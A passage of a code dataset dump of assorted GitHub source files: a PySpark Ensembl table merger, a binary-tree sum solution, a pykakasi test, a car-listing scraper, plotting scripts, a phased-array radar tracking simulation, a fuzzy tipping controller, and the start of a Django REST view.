ET REPRÉSENTATION GRAPHIQUE\n########################################\nX = odeint(F, X0, t) # résolution\nu = X[:,0] # récupération des données\nplt.plot(t, u)\nplt.xlabel(\"Temps (s)\")\nplt.ylabel(\"Tension (V)\")","repo_name":"remimetzdorff/mp2i","sub_path":"python/td5_mwe_odeint.py","file_name":"td5_mwe_odeint.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"15544556210","text":"import os\n\nfrom pyspark.sql import SparkSession\n\nfrom labw_utils.commonutils.libfrontend import setup_basic_logger\nfrom labw_utils.commonutils.stdlib_helper.logger_helper import get_logger\n\n_lh = get_logger()\n\nPRIMIARY_KEY_RENAME_TABLE = {\n \"transcript_id\": \"ensdb_pk_transcript_id\",\n \"gene_id\": \"ensdb_pk_gene_id\",\n \"exon_id\": \"ensdb_pk_exon_id\",\n \"repeat_feature_id\": \"ensdb_pk_repeat_feature_id\"\n}\n\nsetup_basic_logger()\nspark = SparkSession.builder.getOrCreate()\n_lh.info(\"Using pyspark version %s\", spark.version)\ntranscript_table = spark.read.parquet(os.path.join(\"converted_parquet\", \"transcript.parquet\"))\nseq_region_synonym_table = spark.read.parquet(os.path.join(\"converted_parquet\", \"seq_region_synonym.parquet\"))\nexternal_db_table = spark.read.parquet(os.path.join(\"converted_parquet\", \"external_db.parquet\"))\ngene_table = spark.read.parquet(os.path.join(\"converted_parquet\", \"gene.parquet\"))\nexon_table = spark.read.parquet(os.path.join(\"converted_parquet\", \"exon.parquet\"))\nexon_transcript_table = spark.read.parquet(os.path.join(\"converted_parquet\", \"exon_transcript.parquet\"))\nrepeat_feature_table = spark.read.parquet(os.path.join(\"converted_parquet\", \"repeat_feature.parquet\"))\nrepeat_consensus_table = spark.read.parquet(os.path.join(\"converted_parquet\", \"repeat_consensus.parquet\"))\n\nseq_region_synonym_converter = (\n seq_region_synonym_table.\n select(\n \"seq_region_id\",\n \"external_db_id\",\n \"synonym\"\n ).\n join(\n external_db_table.\n select(\"external_db_id\", \"db_name\").\n filter(\"db_name = 'UCSC'\"),\n on=\"external_db_id\"\n ).\n select(\n \"seq_region_id\",\n \"synonym\"\n )\n)\n\n\ndef merge_gene():\n global ens_hgnc_gene_map_table\n _lh.info(\"Merging genes...\")\n final_locus = (\n gene_table.\n select(\n \"gene_id\",\n \"seq_region_id\",\n \"seq_region_start\",\n \"seq_region_end\",\n \"seq_region_strand\"\n ).\n join(\n seq_region_synonym_converter,\n on=\"seq_region_id\",\n how=\"inner\"\n ).\n drop(\"seq_region_id\").\n withColumnRenamed(\"synonym\", \"seqname\").\n withColumnRenamed(\"seq_region_start\", \"start\").\n withColumnRenamed(\"seq_region_end\", \"end\").\n withColumnRenamed(\"seq_region_strand\", \"strand\").\n withColumnsRenamed(PRIMIARY_KEY_RENAME_TABLE)\n )\n final_gene = (\n gene_table.\n select(\n \"gene_id\",\n \"stable_id\",\n \"version\",\n \"created_date\",\n \"modified_date\"\n ).\n withColumnRenamed(\"stable_id\", \"ensdb_gene_id\").\n withColumnRenamed(\"version\", \"ensdb_gene_version\").\n withColumnRenamed(\"created_date\", \"ensdb_gene_created_date\").\n withColumnRenamed(\"modified_date\", \"ensdb_gene_modified_date\").\n withColumnRenamed(\"gene_id\", \"ensdb_pk_gene_id\")\n )\n joint_table = final_gene.join(final_locus, on=\"ensdb_pk_gene_id\", how=\"inner\")\n joint_table.write.parquet(\n \"ensdb_genes.parquet.d\",\n mode=\"overwrite\"\n )\n return joint_table\n\n\ndef merge_transcripts():\n _lh.info(\"Merging transcripts...\")\n final_locus = (\n transcript_table.\n select(\n \"transcript_id\",\n \"seq_region_id\",\n \"seq_region_start\",\n \"seq_region_end\",\n \"seq_region_strand\"\n ).\n join(\n seq_region_synonym_converter,\n on=\"seq_region_id\",\n how=\"inner\"\n ).\n drop(\"seq_region_id\").\n withColumnRenamed(\"synonym\", \"seqname\").\n withColumnRenamed(\"seq_region_start\", \"start\").\n withColumnRenamed(\"seq_region_end\", \"end\").\n withColumnRenamed(\"seq_region_strand\", \"strand\").\n withColumnsRenamed(PRIMIARY_KEY_RENAME_TABLE)\n )\n final_misc = (\n transcript_table.\n select(\n \"transcript_id\",\n \"gene_id\",\n \"source\",\n \"description\",\n \"stable_id\",\n \"version\",\n \"created_date\",\n \"modified_date\"\n ).\n withColumnRenamed(\"stable_id\", \"ensdb_transcript_id\").\n withColumnRenamed(\"version\", \"ensdb_transcript_version\").\n withColumnRenamed(\"created_date\", \"ensdb_transcript_created_date\").\n withColumnRenamed(\"modified_date\", \"ensdb_transcript_modified_date\").\n withColumnsRenamed(PRIMIARY_KEY_RENAME_TABLE)\n )\n joint_table = final_locus.join(final_misc, on=\"ensdb_pk_transcript_id\", how=\"inner\")\n joint_table.write.parquet(\n \"ensdb_transcripts.parquet.d\",\n mode=\"overwrite\"\n )\n return joint_table\n\n\ndef merge_exons():\n _lh.info(\"Merging exons...\")\n final_locus = (\n exon_table.\n select(\n \"exon_id\",\n \"seq_region_id\",\n \"seq_region_start\",\n \"seq_region_end\",\n \"seq_region_strand\"\n ).\n join(\n seq_region_synonym_converter,\n on=\"seq_region_id\",\n how=\"inner\"\n ).\n drop(\"seq_region_id\").\n withColumnRenamed(\"synonym\", \"seqname\").\n withColumnRenamed(\"seq_region_start\", \"start\").\n withColumnRenamed(\"seq_region_end\", \"end\").\n withColumnRenamed(\"seq_region_strand\", \"strand\").\n withColumnsRenamed(PRIMIARY_KEY_RENAME_TABLE)\n )\n final_misc = (\n exon_table.\n select(\n \"exon_id\",\n \"stable_id\",\n \"version\",\n \"created_date\",\n \"modified_date\"\n ).\n withColumnRenamed(\"stable_id\", \"ensdb_exon_id\").\n withColumnRenamed(\"version\", \"ensdb_exon_version\").\n withColumnRenamed(\"created_date\", \"ensdb_exon_created_date\").\n withColumnRenamed(\"modified_date\", \"ensdb_exon_modified_date\").\n withColumnsRenamed(PRIMIARY_KEY_RENAME_TABLE)\n )\n final_mapping = (\n exon_transcript_table.\n select(\n \"transcript_id\",\n \"exon_id\"\n ).\n withColumnsRenamed(PRIMIARY_KEY_RENAME_TABLE)\n )\n\n joint_table = (\n final_locus.\n join(final_mapping, on=\"ensdb_pk_exon_id\", how=\"inner\").\n join(final_misc, on=\"ensdb_pk_exon_id\", how=\"inner\")\n )\n joint_table.write.parquet(\n \"ensdb_exons.parquet.d\",\n mode=\"overwrite\"\n )\n return joint_table\n\n\ndef merge_repeats():\n _lh.info(\"Merging repeats...\")\n final_locus = (\n repeat_feature_table.\n select(\n \"repeat_feature_id\",\n \"seq_region_id\",\n \"seq_region_start\",\n \"seq_region_end\",\n \"seq_region_strand\"\n ).\n join(\n seq_region_synonym_converter,\n on=\"seq_region_id\",\n how=\"inner\"\n ).\n drop(\"seq_region_id\").\n withColumnRenamed(\"synonym\", \"seqname\").\n withColumnRenamed(\"seq_region_start\", \"start\").\n withColumnRenamed(\"seq_region_end\", \"end\").\n withColumnRenamed(\"seq_region_strand\", \"strand\").\n withColumnsRenamed(PRIMIARY_KEY_RENAME_TABLE)\n )\n final_misc = (\n repeat_feature_table.\n select(\n \"repeat_feature_id\",\n \"repeat_consensus_id\",\n \"score\",\n \"repeat_start\",\n \"repeat_end\"\n ).\n join(\n repeat_consensus_table.drop(\"repeat_consensus\"),\n on=\"repeat_consensus_id\",\n how=\"inner\"\n ).\n withColumnsRenamed(PRIMIARY_KEY_RENAME_TABLE)\n )\n joint_table = final_locus.join(final_misc, on=\"ensdb_pk_repeat_feature_id\", how=\"inner\")\n joint_table.write.parquet(\n \"ensdb_repeats.parquet.d\",\n mode=\"overwrite\"\n )\n return joint_table\n\n\n\nif __name__ == \"__main__\":\n gene_table = merge_gene()\n transcripts_table = merge_transcripts()\n exons_table = merge_exons()\n repeats_table = merge_repeats()\n\n","repo_name":"WanluLiuLab/labw_utils","sub_path":"explore/ensembl_database_dump/transcript_merge.spark.py","file_name":"transcript_merge.spark.py","file_ext":"py","file_size_in_byte":7928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74896156306","text":"\"\"\"\nGiven a binary tree containing digits from 0-9 only, each root-to-leaf path could represent a number.\n\nAn example is the root-to-leaf path 1->2->3 which represents the number 123.\n\nFind the total sum of all root-to-leaf numbers.\n\nFor example,\n\n 1\n / \\\n 2 3\nThe root-to-leaf path 1->2 represents the number 12.\nThe root-to-leaf path 1->3 represents the number 13.\n\nReturn the sum = 12 + 13 = 25.\n\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def sumNumbers(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n total = [0]\n def depthFirstSearch(numSoFar, node, total):\n if node == None:\n return\n numSoFar = numSoFar + str(node.val)\n \n if node.left == None and node.right == None:\n total[0] += int(numSoFar)\n \n if node.left != None:\n depthFirstSearch(numSoFar, node.left, total)\n \n if node.right != None:\n depthFirstSearch(numSoFar, node.right, total)\n \n \n depthFirstSearch(\"\", root, total)\n return total[0]\n \n ","repo_name":"Faiz-zz-zz/interview_questions","sub_path":"bin_tree_sum_to_leaves.py","file_name":"bin_tree_sum_to_leaves.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"45105735556","text":"# -*- coding: utf-8 -*-\nimport os,sys,bz2\nfrom types import *\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\ntry: #python2\n import cPickle as pickle\nexcept: #python3\n import pickle\n\nimport shutil\nimport pykakasi.genkanwadict as genkanwadict\n\nclass TestGenkanwadict(unittest.TestCase):\n kanwa = None\n def constructor(self):\n self.kanwa = genkanwadict.mkkanwa()\n self.assertEqual(self.kanwa, object)\n \n def test_mkdict(self):\n if self.kanwa is None:\n self.kanwa = genkanwadict.mkkanwa()\n\n src = os.path.join('tests','kanadict.utf8')\n dst = os.path.join('/tmp','test_kanadict.pickle')\n self.kanwa.mkdict(src, dst)\n # load test\n with open(dst,'rb') as f:\n (mydict, maxkeylen) = pickle.load(f)\n os.unlink(dst)\n self.assertTrue(isinstance(mydict, dict))\n self.assertEqual(maxkeylen, 3)\n\n def test_mkkanwa(self):\n if self.kanwa is None:\n self.kanwa = genkanwadict.mkkanwa()\n\n src = os.path.join('tests','kakasidict.utf8')\n dst = os.path.join('/tmp','test_kanwadict2.db')\n self.kanwa.run(src, dst)\n os.unlink(os.path.join('/tmp','test_kanwadict2.db'))\n","repo_name":"Mahfooz511/Furiganize","sub_path":"pykakasi-master/tests/test_genkanwadict.py","file_name":"test_genkanwadict.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70952932306","text":"# Framework imports\nimport requests\nimport bs4\n\n\nclass WebmotorsCrawler(object):\n\n \"\"\"\n Cralwer for Webmotors Site\n \"\"\"\n\n def __init__(self, brand, model, init_year, final_year):\n super(WebmotorsCrawler, self).__init__()\n self.brand = brand\n self.model = model\n self.init_year = init_year\n self.final_year = final_year\n\n def get_final_url(self):\n url = 'http://www.webmotors.com.br/comprar/carros/novos-usados/'\n url = url + 'veiculos-todos-estados/{brand}/{model}/?tipoveiculo=carros'\n url = url + '&tipoanuncio=novos|usados&marca1={brand}&modelo1={model}'\n url = url + '&anode={init_year}&anoate={final_year}&estado1=veiculos-todos-estados'\n url = url.format(brand=self.brand,\n model=self.model,\n init_year=self.init_year,\n final_year=self.final_year)\n\n return url\n\n def extract_data(self):\n response = requests.get(self.get_final_url())\n soup = bs4.BeautifulSoup(response.text, \"html.parser\")\n\n # setting arrays\n arrayPrices = []\n arrayYear = []\n arrayColors = []\n arrayKm = []\n arrayCambio = []\n\n # Details\n details = soup.select('div#anuncios .tipo1 .info .features')\n for detail in details:\n text = detail.get_text()\n text = text.replace('\\n\\n', \"\")\n text = text.split('\\n')\n arrayYear.append(text[0])\n arrayColors.append(text[1])\n arrayKm.append(text[2])\n arrayCambio.append(text[3])\n\n # Links\n links = soup.select('div#anuncios .tipo1')\n arrayLinks = [link.get('href') for link in links]\n\n # Titles\n titles = soup.select('div#anuncios .tipo1 .info .make-model')\n arrayTitles = [title.get_text() for title in titles]\n\n # Subtitles\n subtitles = soup.select('div#anuncios .tipo1 .info .version')\n arraySubtitles = [subtitle.get_text() for subtitle in subtitles]\n\n # Photos\n photos = soup.select('div#anuncios .c-after .photo img')\n arrayPhotos = [photo.get('data-original') for photo in photos]\n\n # Price\n prices = soup.select('div#anuncios .c-after .photo .price')\n\n for price in prices:\n text = price.get_text()\n text = text.replace('\\n', \"\")\n text = text.replace('\\r', \"\")\n text = text.replace('\\t', \"\")\n\n arrayPrices.append(text)\n\n arrayFinal = []\n\n # create the dict\n for i, photo in enumerate(arrayPhotos):\n car = {'title': arrayTitles[i],\n 'subtitle': arraySubtitles[i],\n 'link': arrayLinks[i],\n 'photo': arrayPhotos[i],\n 'price': arrayPrices[i],\n 'year': arrayYear[i],\n 'color': arrayColors[i],\n 'km': arrayKm[i],\n 'cambio': arrayCambio[i]\n }\n arrayFinal.append(car)\n\n return arrayFinal\n","repo_name":"dietherwerk/test_crawler","sub_path":"crawlers/webmotors.py","file_name":"webmotors.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6440391092","text":"import matplotlib.pyplot as plt\nimport pandas as pd\n\ncase_study = 'Lane-keeping'\n# case_study = 'AV'\n\nif case_study == 'AV':\n fold_idx = 1#4\n config_str = 'config_2'#'config_4'\nelse:\n fold_idx = 4\n config_str = 'config_4'\n\nnum_tr_fot = 20\n\npath = \"output/\" + case_study + \"/fold_\" + str(fold_idx) + \"_tr_\" + str(num_tr_fot) + \"/\"\ntrace_file_name = \"simul_trace.csv\"\nraw_df = pd.read_csv(path + trace_file_name)\n\n\nmodel_str_list = ['Random_loss', 'PR_loss', 'RF_loss', 'BCxGAIL_nondet_ppo_loss']\nmodel_title_list = ['Random', 'PR', 'RF', 'ENVI']\n# [FOT,Random_loss,RF_loss,PR_loss,\n# BC_det_loss,BC_det_eucl,BC_det_dtw,\n# BC_nondet_loss,BC_nondet_eucl,BC_nondet_dtw,\n# GAIL_det_ppo_loss,GAIL_det_ppo_eucl,GAIL_det_ppo_dtw,\n# GAIL_nondet_ppo_loss,GAIL_nondet_ppo_eucl,GAIL_nondet_ppo_dtw,\n# BCxGAIL_det_ppo_loss,BCxGAIL_det_ppo_eucl,BCxGAIL_det_ppo_dtw,\n# BCxGAIL_nondet_ppo_loss,BCxGAIL_nondet_ppo_eucl,BCxGAIL_nondet_ppo_dtw]\n\n\nnum_x_figs = len(model_str_list)\n\ndefault_font_size = 10\nplt.style.use('seaborn-whitegrid')\nfig, axes = plt.subplots(1, num_x_figs, figsize=(14, 4), dpi=200)\n#top_ax = fig.add_subplot(111)\n\n\n\nFOT_trace = raw_df['FOT_' + config_str].to_numpy()\nif case_study == 'Lane-keeping':\n FOT_trace = (FOT_trace * 40) / 3\nelse:\n FOT_trace = FOT_trace * 1000 + 1200\n\nfor x_fig_idx in range(num_x_figs):\n ax_temp = axes[x_fig_idx]\n title = model_str_list[x_fig_idx] + '_' + config_str\n simul_trace = raw_df[title].to_numpy()\n\n if case_study == 'Lane-keeping':\n simul_trace = (simul_trace * 40) / 3\n else:\n simul_trace = simul_trace * 1000 + 1200\n\n\n ax_temp.plot(FOT_trace, label='FOT')\n ax_temp.plot(simul_trace, label='Simulation')\n if case_study == 'AV':\n # ax_temp.set_ylim(-1, -0.4)\n ax_temp.set_ylabel('Displacement (' + r'$mm$' + ')', fontsize=default_font_size * 1.2)\n ax_temp.set_xticks([i for i in range(0, 200, 40)], [i * 50 for i in range(0, 200, 40)])\n else:\n ax_temp.set_ylabel('Displacement (' + r'$mm$' + ')', fontsize=default_font_size * 1.2)\n ax_temp.set_xticks([i for i in range(0, 100, 20)], [i * 50 for i in range(0, 100, 20)])\n\n\n ax_temp.set_title(model_title_list[x_fig_idx], fontsize = default_font_size * 1.2)\n\n\n ax_temp.set_xlabel('Time (' + r'$ms$' + ')', fontsize=default_font_size * 1.2)\n\n\n\n\nfig.subplots_adjust(bottom=0.2)\nlines, labels = fig.axes[-1].get_legend_handles_labels()\nfig.legend(lines, labels, bbox_to_anchor=(0.5, 0.01), loc='lower center', ncol=2, frameon=True)\n\nplt.subplots_adjust(left=0.08,\n bottom=0.2,\n right=0.97,\n top=0.92,\n wspace=0.35,\n hspace=0.2)\n\n# fig.supxlabel('Time (tick)', fontsize = default_font_size * 1.5)\n# fig.supylabel('Lane color observed by the lane-keeping system version $\\mathit{x}$', fontsize = default_font_size * 1.5)\n# fig.suptitle('FOT and simulation trace of the environment models', fontsize = default_font_size * 1.8)\n# plt.show()\nplt.savefig(path + 'trace_vis.png')\n\n","repo_name":"yongjunshin/ENVI","sub_path":"simulation_visualization.py","file_name":"simulation_visualization.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12538903624","text":"# %% [markdown]\n# # Adaptive Tracking Simulation Example\n\n# %% [markdown]\n# ## Setup\n\n# %%\nfrom datetime import datetime, timedelta\nstart_time = datetime.now()\n\n# %% [markdown]\n# ## Radar system\n\n# %%\nfrom mpar_sim.radar import PhasedArrayRadar\nfrom mpar_sim.beam.beam import RectangularBeam, GaussianBeam\nfrom mpar_sim.looks.look import Look\nfrom mpar_sim.resource_management import PAPResourceManager\nfrom mpar_sim.schedulers import BestFirstScheduler\nimport numpy as np\n\nradar = PhasedArrayRadar(\n position=np.array([[0], [0], [0]]),\n position_mapping=(0, 2, 4),\n rotation_offset=np.array([[0], [0], [0]]),\n # Array parameters\n n_elements_x=32,\n n_elements_y=32,\n element_spacing=0.5, # Wavelengths\n element_tx_power=10,\n # System parameters\n center_frequency=3e9,\n system_temperature=290,\n noise_figure=4,\n # Scan settings\n beam_shape=GaussianBeam,\n az_fov=[-90, 90],\n el_fov=[-90, 90],\n # Detection settings\n false_alarm_rate=1e-6,\n)\nradar.timestamp = start_time\n\nmanager = PAPResourceManager(radar,\n max_duty_cycle=0.1,\n max_bandwidth=100e6)\nscheduler = BestFirstScheduler(manager,\n sort_key=\"priority\",\n reverse_sort=True,\n max_queue_size=10,\n max_time_delta=timedelta(seconds=0.5))\n\n\n# %% [markdown]\n# Raster scan agent\n\n# %%\nfrom mpar_sim.agents.raster_scan import RasterScanAgent\nimport numpy as np\n\nsearch_agent = RasterScanAgent(\n azimuth_scan_limits=np.array([-30, 30]),\n elevation_scan_limits=np.array([-5, 5]),\n azimuth_beam_spacing=0.8,\n elevation_beam_spacing=0.8,\n azimuth_beamwidth=15,\n elevation_beamwidth=15,\n bandwidth=100e6,\n pulsewidth=1e-6,\n prf=5e3,\n n_pulses=10,\n)\n\n# %% [markdown]\n# ## Tracker Components\n\n# %% [markdown]\n# Create tracker\n\n# %%\nfrom stonesoup.measures import Mahalanobis, Euclidean\nfrom stonesoup.hypothesiser.distance import DistanceHypothesiser\nfrom stonesoup.updater.kalman import ExtendedKalmanUpdater\nfrom stonesoup.predictor.kalman import KalmanPredictor\nfrom stonesoup.models.transition.linear import CombinedLinearGaussianTransitionModel, ConstantVelocity\nfrom stonesoup.gater.distance import DistanceGater\n\n# KF prediction model. Assuming it's matched to the true target model for now\ntransition_model = CombinedLinearGaussianTransitionModel([\n ConstantVelocity(10),\n ConstantVelocity(10),\n ConstantVelocity(0.0),\n])\npredictor = KalmanPredictor(transition_model)\n\nupdater = ExtendedKalmanUpdater(measurement_model=None)\n\nhypothesizer = DistanceHypothesiser(\n predictor, updater, measure=Mahalanobis(), missed_distance=100)\ngater = DistanceGater(hypothesizer, measure=Mahalanobis(), gate_threshold=25)\n\n\n# %% [markdown]\n# Create the data associator\n\n# %%\nfrom stonesoup.dataassociator.neighbour import GNNWith2DAssignment\ndata_associator = GNNWith2DAssignment(gater)\n\n# %% [markdown]\n# Create the deleter\n\n# %%\nfrom stonesoup.deleter.time import UpdateTimeStepsDeleter, UpdateTimeDeleter\ndeleter = UpdateTimeDeleter(timedelta(seconds=2))\n\n\n# %% [markdown]\n# Create the initiator\n\n# %%\nfrom stonesoup.types.state import GaussianState\nfrom stonesoup.initiator.simple import MultiMeasurementInitiator, SimpleMeasurementInitiator\nimport numpy as np\nfrom mpar_sim.initiator.initators import MofNInitiator\n\n\ninitiator = MofNInitiator(\n prior_state=GaussianState([0, 0, 0, 0, 0, 0], np.diag([0, 0, 0, 0, 0, 0])),\n measurement_model=None,\n deleter=deleter,\n data_associator=data_associator,\n updater=updater,\n confirmation_threshold=[4,5],\n)\n\n# %% [markdown]\n# Tracking agent\n\n# %%\nfrom mpar_sim.agents.track_while_scan import TWSAgent\nfrom mpar_sim.agents.adaptive_track import AdaptiveTrackAgent\nfrom mpar_sim.beam.common import aperture2beamwidth\n\ntrack_agent = AdaptiveTrackAgent(\n initiator,\n data_associator,\n predictor,\n updater,\n deleter,\n # Adaptive track parameters\n track_sharpness=0.25,\n min_revisit_rate=0.5,\n max_revisit_rate=5,\n confirm_rate=20,\n # Task parameters\n azimuth_beamwidth=5,\n elevation_beamwidth=5,\n bandwidth=100e6,\n pulsewidth=1e-6,\n prf=5e3,\n n_pulses=100\n)\n\n# track_agent = TWSAgent(initiator, data_associator, updater, deleter)\n\n\n# %% [markdown]\n# ## Run the simulation\n\n# %%\nimport operator\nfrom stonesoup.types.groundtruth import GroundTruthPath, GroundTruthState\nfrom stonesoup.types.array import CovarianceMatrix\nfrom stonesoup.types.state import StateVector\nimport random\n# Set the simulation seed\nseed = np.random.randint(0, 2**32-1)\nnp.random.seed(seed)\nrandom.seed(seed)\n\n# Simulation-level parameters\nn_steps = 500\ninclude_noise = True\n\n# Target generation parameters\nn_targets_max = 5\ninitial_state_mean = StateVector([100, 10, 0, 0, 0, 0])\ninitial_state_covariance = CovarianceMatrix(np.diag([100, 5, 20, 5, 0, 0]))\ninitial_state = GaussianState(initial_state_mean, initial_state_covariance)\ndeath_probability = 0.0\nbirth_probability = 0.1\ntarget_rcs = 1\n\n\ntruths = []\nall_truths = []\nconfirmed_tracks = set()\ntentative_tracks = set()\nall_measurements = []\nall_tracks = set()\n\n# Simulation time variables. \ntime = start_time\nscheduler_time = start_time\nfor istep in range(n_steps):\n detections = set()\n\n ########################################\n # Target birth/death\n ########################################\n # Delete targets according to the death process\n truths = [truth for truth in truths if np.random.rand() > death_probability]\n # Also randomly delete targets if we have exceeded the maximum target count\n if len(truths) > n_targets_max:\n indices = np.random.choice(\n len(truths), len(truths) - n_targets_max, replace=False)\n for index in sorted(indices, reverse=True):\n del truths[index]\n \n\n # Targets, be reborn!\n for _ in range(np.random.poisson(birth_probability)):\n \n if len(truths) >= n_targets_max:\n break\n \n # Sample an initial state from the mean and covariance defined above\n state_vector = initial_state.state_vector + \\\n initial_state.covar @ np.random.randn(initial_state.ndim, 1)\n if state_vector[0] < 0:\n state_vector[0] = -state_vector[0]\n if state_vector[1] < 0:\n state_vector[1] = -state_vector[1]\n state = GroundTruthState(\n state_vector=state_vector,\n timestamp=time,\n )\n \n # Give the target an RCS\n # TODO: Create a GroundTruthTarget class with an RCS attribute\n state.rcs = target_rcs\n # Add to the list of truths\n truth = GroundTruthPath([state])\n truths.append(truth)\n all_truths.append(truth)\n\n ########################################\n # Allocate resources and simulate\n ########################################\n # Generate looks from each \n search_look = search_agent.act(current_time=scheduler_time)\n track_looks = track_agent.act(current_time=scheduler_time)\n looks = [search_look] + track_looks\n\n # Schedule new looks, sorted so that the task with the nearest end time is selected first below\n scheduler.schedule(looks, scheduler_time)\n manager.allocated_tasks.sort(\n key=operator.attrgetter(\"end_time\"), reverse=True)\n # Minimum start time of all scheduled tasks. When this changes, a new \"batch\" of tasks has been allocated and the scenario needs to be updated\n min_start_time = min([task.start_time for task in manager.allocated_tasks]\n ) if manager.allocated_tasks else time\n\n # Get the next look and simulate it\n look = manager.allocated_tasks.pop()\n scheduler_time = look.end_time\n radar.load_look(look)\n detections = radar.measure(truths, noise=include_noise)\n \n # Update tracks\n confirmed_tracks = track_agent.update_tracks(detections, time)\n\n # Update targets\n if min_start_time > time:\n dt = min_start_time - time\n time = min_start_time\n # Update targets\n for truth in truths:\n truth.append(GroundTruthState(\n transition_model.function(truth[-1],\n noise=include_noise,\n time_interval=dt),\n timestamp=time))\n truth[-1].rcs = target_rcs\n \n all_measurements.append(detections)\n all_tracks |= confirmed_tracks\n\n\n# %% [markdown]\n# ## Plot simulation results\n\n# %%\nfrom stonesoup.plotter import Plotterly\n\nplotter = Plotterly()\nplotter.plot_sensors(radar, \"Radar\")\nplotter.plot_ground_truths(all_truths, [0, 2])\nplotter.plot_measurements(all_measurements, [0, 2])\nplotter.plot_tracks(all_tracks, [0,2])\n\nplotter.fig\n\n# %%\nfrom stonesoup.metricgenerator.basicmetrics import BasicMetrics\n\nbasic_generator = BasicMetrics()\n\nfrom stonesoup.metricgenerator.manager import SimpleManager\n\nmetric_manager = SimpleManager([basic_generator],\n associator=data_associator)\n\n\n","repo_name":"ShaneFlandermeyer/mpar-sim","sub_path":"examples/adaptive_tracking.py","file_name":"adaptive_tracking.py","file_ext":"py","file_size_in_byte":8847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39589540789","text":"import numpy as np\nimport skfuzzy as fuzz\nfrom skfuzzy import control as ctrl\n\n#1.DECLARAMOS LAS VARIABLES DE ENTRADA Y SALIDA\n\n#INPUTS\ncalidad_comida = ctrl.Antecedent(np.arange(0,101,1), 'calidad_comida')\nservicio = ctrl.Antecedent(np.arange(0,101,1), 'servicio')\n#OUTPUT\npropina = ctrl.Consequent(np.arange(0,101,1), 'propina')\n\n#2. ASIGNAMOS MEMBRESIAS:\n\n#aUTO-MEMBERSHIP FUNCTION POPULATION\n\ncalidad_comida['desagradable']= fuzz.trimf(calidad_comida.universe, [0,0,20])\ncalidad_comida['mediocre']= fuzz.gaussmf(calidad_comida.universe,30,15)\ncalidad_comida['normal']= fuzz.gaussmf(calidad_comida.universe, 50,5.0)\ncalidad_comida['rica']= fuzz.trimf(calidad_comida.universe, [50,70,85])\ncalidad_comida['deliciosa']= fuzz.gbellmf(calidad_comida.universe, 20,70,100)\n\nservicio['nulo']= fuzz.trimf(propina.universe, [0,0,20])\nservicio['malo']= fuzz.trimf(propina.universe, [15,20,40])\nservicio['normal']= fuzz.trimf(propina.universe, [30,50,60])\nservicio['bueno']= fuzz.trimf(propina.universe, [50,70,85])\nservicio['excelente']= fuzz.trimf(propina.universe, [75,100,100])\n\npropina['minimo']= fuzz.trimf(propina.universe, [0,0,20])\npropina['poca']= fuzz.trimf(propina.universe, [15,20,40])\npropina['media']= fuzz.trimf(propina.universe, [30,50,60])\npropina['moderada']= fuzz.trimf(propina.universe, [50,70,85])\npropina['alta']= fuzz.trimf(propina.universe, [75,100,100])\n\n#3. HACER LOS CONJUNTOS DE REGLAS (IF THEN)\n\nrule1 = ctrl.Rule(calidad_comida['desagradable'] | servicio['nulo'], propina['minimo'])\nrule2=ctrl.Rule(calidad_comida['mediocre'] | servicio['malo'] ,propina['poca'])\nrule3= ctrl.Rule(calidad_comida['normal'] | servicio['normal'], propina['media'])\nrule4=ctrl.Rule(calidad_comida['rica'] | servicio['bueno'], propina['moderada'])\nrule5=ctrl.Rule(calidad_comida['deliciosa'] | servicio['excelente'], propina['alta'])\n\n#4. DEFINIR EL CONTROL DEL SISTEMA\n\ntipping_ctrl = ctrl.ControlSystem([rule1, rule2, rule3, rule4, rule5])\ntipping= ctrl.ControlSystemSimulation(tipping_ctrl)\n\n# 5. DEFINIR LAS ENTRADAS NUMPERICAS PARA CADA VARIABLE DE ENTRADA\ninput_calidad=int(input('Inserte su puntaje para \"CALIDA DE COMIDA\" (1-100): '))\ninput_servicio=int(input('Inserte su puntaje para el \"SERVICIO\" (1-100): '))\ntipping.input['calidad_comida']=input_calidad\ntipping.input['servicio'] = input_servicio\n\n#6. HACER LA FUZZYFICACION Y DESFUZZIFICACION DEL SISTEMA\ntipping.compute()\n\n#7. IMPRIMIR LOS RESULTADOS\noutput_propina= tipping.output['propina']\nprint('La propina apropiada sería :',output_propina)","repo_name":"willandru/AI","sub_path":"INTRO_AI/FUZZY/propinas/propinas.py","file_name":"propinas.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21960284302","text":"from django.conf import settings\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom social_impact.models import Project, SIORMeasurement, Publication\n\n\nclass ProjectsMetaData(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n\n def get(self, request, format=None):\n projects = Project.objects.filter(created_by=request.user).order_by('start_date')\n active_projects = Project.objects.filter(status='active', created_by=request.user).count()\n projects_with_impact = SIORMeasurement.objects.filter(created_by=request.user).distinct('project').count()\n response = {\n 'total_projects': projects.count(),\n 'projects_source': 'Cordis',\n 'active_projects': active_projects,\n 'start_year': projects[0].start_date.year,\n 'end_year': projects.order_by('-start_date')[0].start_date.year,\n 'projects_with_impact': projects_with_impact\n }\n return Response(response)\n\n\nclass ProjectList(APIView):\n authentication_classes = (SessionAuthentication, 